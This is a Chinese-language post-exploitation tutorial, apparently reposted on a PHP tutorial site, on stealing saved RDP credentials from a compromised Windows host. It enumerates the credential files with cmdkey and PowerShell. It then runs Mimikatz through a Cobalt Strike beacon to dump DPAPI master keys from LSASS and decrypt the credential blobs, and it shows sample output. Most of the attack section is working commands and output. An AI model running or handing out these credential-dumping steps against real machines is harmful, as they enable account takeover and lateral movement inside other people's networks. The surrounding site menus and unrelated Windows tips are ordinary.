微信公众号 讲师中心
首页
文章
后端开发 web前端 数据库 开发工具 php框架 常见问题 科技 Java 系统教程 电脑教程 硬件教程 手机教程 软件教程 游戏教程 自媒体 新闻
专题
后端开发 web前端 数据库 开发工具 php框架 科技 Java 系统教程 电脑教程 硬件教程 手机教程 软件教程 游戏教程 新闻
AI工具
AI 聊天问答 Agent智能体 AI 文本写作 AI 绘画作图 AI 设计工具 AI 视频创作 AI 音频制作 AI 办公学习 AI 编程开发 Prompt指令
学习
大前端 后端开发 数据库 移动端 运维开发 计算机基础
编程手册
大前端 后端开发 数据库 移动端 运维开发 计算机基础
下载
js特效 网站源码 工具下载 类库下载 网站素材 学习资源 插件扩展 手机/移动开发 手机游戏
搜索
后端开发 web前端 数据库 开发工具 php框架 常见问题 科技 Java 系统教程 电脑教程 硬件教程 手机教程 软件教程 游戏教程
自媒体 新闻
首页 > 系统教程 > Windows系列 > 正文

内网渗透 | 获取远程主机保存的RDP凭据密码

蓮花仙者
发布: 2025-09-02 08:40:31
原创
1029人浏览过

简要记录获取远程主机rdp凭据的方法。

Windows保存RDP凭据的目录为:

C:\Users\用户名\AppData\Local\Microsoft\Credentials
登录后复制

可以通过命令行获取,执行以下命令:

cmdkey /list或powerpick Get-ChildItem C:\Users\rasta_mouse\AppData\Local\Microsoft\Credentials\ -Force
登录后复制

注意:

cmdkey /list
登录后复制
命令必须在Session会话下执行,在system下执行不会有结果。

内网渗透 | 获取远程主机保存的RDP凭据密码

使用Cobalt Strike中的Mimikatz可以获取部分所需的masterkey和pbData:

mimikatz dpapi::cred /in:C:\Users\USERNAME\AppData\Local\Microsoft\Credentials\SESSIONID
登录后复制

输出应类似于:

**BLOB**  dwVersion : 00000001 - 1  guidProvider : {df9d8cd0-1501-11d1-8c7a-00c04fc297eb}  dwMasterKeyVersion : 00000001 - 1  guidMasterKey : {0785cf41-0f53-4be7-bc8b-6cb33b4bb102}  dwFlags : 20000000 - 536870912 (system ; )  dwDescriptionLen : 00000012 - 18  szDescription : 本地凭据数据  algCrypt : 00006610 - 26128 (CALG_AES_256)  dwAlgCryptLen : 00000100 - 256  dwSaltLen : 00000020 - 32  pbSalt : 726d845b8a4eba29875****10659ec2d5e210a48f  dwHmacKeyLen : 00000000 - 0  pbHmackKey :  algHash : 0000800e - 32782 (CALG_SHA_512)  dwAlgHashLen : 00000200 - 512  dwHmac2KeyLen : 00000020 - 32  pbHmack2Key : cda4760ed3fb1c7874****28973f5b5b403fe31f233  dwDataLen : 000000c0 - 192  pbData : d268f81c64a3867cd7e96d99578295ea55a47fcaad5f7dd6678989117fc565906cc5a8bfd37137171302b34611ba5****e0b94ae399f9883cf80050f0972693d72b35a9a90918a06d  dwSignLen : 00000040 - 64  pbSign : 63239d3169c99fd82404c0e230****37504cfa332bea4dca0655
登录后复制

需要关注的是

guidMasterKey
登录后复制
pbData
登录后复制
,其中
pbData
登录后复制
是我们要解密的数据,
guidMasterKey
登录后复制
是解密所需的密钥。LSASS已经在其缓存中存有这个key,因此我们可以使用
SeDebugPrivilege
登录后复制
获取。

存了个图
存了个图

视频图片解析/字幕/剪辑,视频高清保存/图片源图提取

存了个图 17
查看详情 存了个图 
beacon> mimikatz !sekurlsa::dpapi
登录后复制

输出应类似于:

mimikatz !sekurlsa::dpapi     [00000001]     * GUID : {0785cf41-0f53-4be7-bc8b-6cb33b4bb102}     * Time : 2020/1/3 8:05:02     * MasterKey : 02b598c2252fa5d8f7fcd***7737644186223f44cb7d958148     * sha1(key) : 3e6dc57a0fe****a902cfaf617b1322     [00000002]     * GUID : {edcb491a-91d7-4d98-a714-8bc60254179f}     * Time : 2020/1/3 8:05:02     * MasterKey : c17a4aa87e9848e9f46c8ca81330***79381103f4137d3d97fe202     * sha1(key) : 5e1b3eb1152d3****6d3d6f90aaeb
登录后复制

然后将凭据保存到本地,执行以下命令:

mimikatz "dpapi::cred /in:C:\Users\USERNAME\Desktop\test\SESSION /masterkey:对应的GUID key"
登录后复制

内网渗透 | 获取远程主机保存的RDP凭据密码

原创作者: Sp4ce

参考来源: Sp4ce's Blog

以上就是内网渗透 | 获取远程主机保存的RDP凭据密码的详细内容,更多请关注php中文网其它相关文章!

相关标签:
windows mac win red Session windows

大家都在看:

最佳 Windows 性能的顶级免费优化软件
最佳 Windows 性能的顶级免费优化软件

每个人都需要一台速度更快、更稳定的 PC。随着时间的推移,垃圾文件、旧注册表数据和不必要的后台进程会占用资源并降低性能。幸运的是,许多工具可以让 Windows 保持平稳运行。

下载
来源:php中文网
收藏 点赞
上一篇:Win10开机缺少winload.efi怎么办?Win10系统缺少文件无法开机图 下一篇:zabbix5.0安装及配置
本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系admin@php.cn
最新问题
windows10如何设置文件夹背景颜色或图片_windows10文件夹背景自定义方法 1、通过个性化设置可切换深色或浅色模式,使文件夹背景变为深灰或白色;2、修改注册表中HKEY_CURRENT_USER\ControlPanel\Colors下的Window值,可自定义RGB颜色;3、安装第三方工具QTTabBar,可在文件夹视图中设置个性化背景色。
2025-11-08 23:56:03
210
win11怎么进入安全模式_Windows11启动安全模式的方法 进入Windows11安全模式可排查系统故障,方法包括:通过设置中的恢复选项、Shift+重启、登录界面强制重启、msconfig配置引导、强制中断启动触发恢复环境,选择启动设置后按F4(安全模式)或F5(带网络)键进入。
2025-11-08 23:51:02
159
windows10如何让笔记本合上盖子不休眠_windows10笔记本合盖不休眠设置方法 合上笔记本盖子后电脑继续运行可通过修改电源设置实现,首先推荐通过控制面板的电源选项将“合盖时”设为“不采取任何操作”,适用于DellXPS13等设备;若选项灰色不可选,需点击“更改当前不可用的设置”解锁权限;也可从系统设置进入“电源和睡眠”找到相关配置;高级用户可使用管理员权限的命令行工具powercfg,通过/setacvalueindex和/setdcvalueindex命令分别设置接通电源和使用电池时的合盖行为为0(无操作),再执行powercfg/sscheme_current使更改生效
2025-11-08 23:23:02
244
win11怎么使用存储感知功能自动清理垃圾文件_Windows 11存储感知自动清理 开启存储感知功能可自动清理临时文件和回收站内容。进入设置→系统→存储→存储感知,开启功能并设置运行频率为每天、每周或每月,同时勾选低存储时自动运行;在临时文件和回收站部分分别设置删除时间条件,如14天或30天后;还可点击“立即运行存储感知”手动执行清理以快速释放空间。
2025-11-08 23:07:02
275
如何备份和还原 Windows 注册表 备份Windows注册表可防止系统故障。1.使用regedit导出特定键或全部注册表项为.reg文件进行备份与还原。2.通过系统还原创建还原点以整体回滚系统状态。3.利用reg命令在命令行中自动化备份与恢复操作。4.借助CCleaner等第三方工具实现更便捷的增量备份与管理。
2025-11-08 23:00:09
945
Windows 11 上右键上下文菜单会随机打开吗?这里有解决方法 通过修改注册表或使用命令行可解决Windows11右键菜单不一致问题,具体方法包括手动编辑注册表、执行reg命令、导入.reg文件及运行sfc/scannow修复系统文件。
2025-11-08 22:09:02
134
win11怎么安装和管理字体_Windows11字体安装与管理教程 安装Windows11字体可通过设置应用拖放、复制到Fonts文件夹、双击文件安装或从MicrosoftStore获取,安装后可在个性化设置中管理字体,包括卸载或隐藏。
2025-11-08 21:42:02
170
win11如何设置静态IP地址_Windows11网络IP手动配置方法 可通过设置应用、网络适配器属性或命令提示符为Windows11设备配置静态IP地址,需指定IP、子网掩码、网关及DNS信息。
2025-11-08 21:29:11
877
Windows 系统文件是什么?这里是你需要了解的内容 Windows系统文件是操作系统核心,位于System32、SysWOW64和Windows根目录,包括DLL、EXE、SYS和INF类型,负责系统运行与硬件管理。为防止误删,应启用隐藏项目显示、设置组策略权限并创建还原点。若系统异常,可运行sfc/scannow检测修复损坏文件,或使用DISM命令修复系统映像,确保系统稳定运行。
2025-11-08 21:19:02
975
windows10如何更改C盘用户文件夹的名称_windows10C盘用户文件夹重命名教程 必须通过其他管理员账户重命名C盘用户文件夹并更新注册表。先启用Administrator账户或创建新管理员账户,登录后重命名C:\Users下的文件夹,再修改注册表HKEY_LOCAL_MACHINE和ProfileImagePath路径,同步更新环境变量及ShellFolders中的旧用户名引用,最后重启并验证原账户登录正常,确保系统配置一致。
2025-11-08 20:51:02
907
相关专题
更多>
热门推荐
开源免费商场系统广告
热门教程
更多>
相关推荐
热门推荐
最新课程
最新下载
更多>
网站特效
网站源码
网站素材
前端模板
关于我们 免责申明 举报中心 意见反馈 讲师合作 广告合作 最新更新 English
php中文网:公益在线php培训,帮助PHP学习者快速成长!
关注服务号 技术交流群
PHP中文网订阅号
每天精选资源文章推送
PHP中文网APP
随时随地碎片化学习

Copyright 2014-2025 https://www.php.cn/ All Rights Reserved | php.cn | 湘ICP备2023035733号

  • PHP学习

  • 技术支持

  • 返回顶部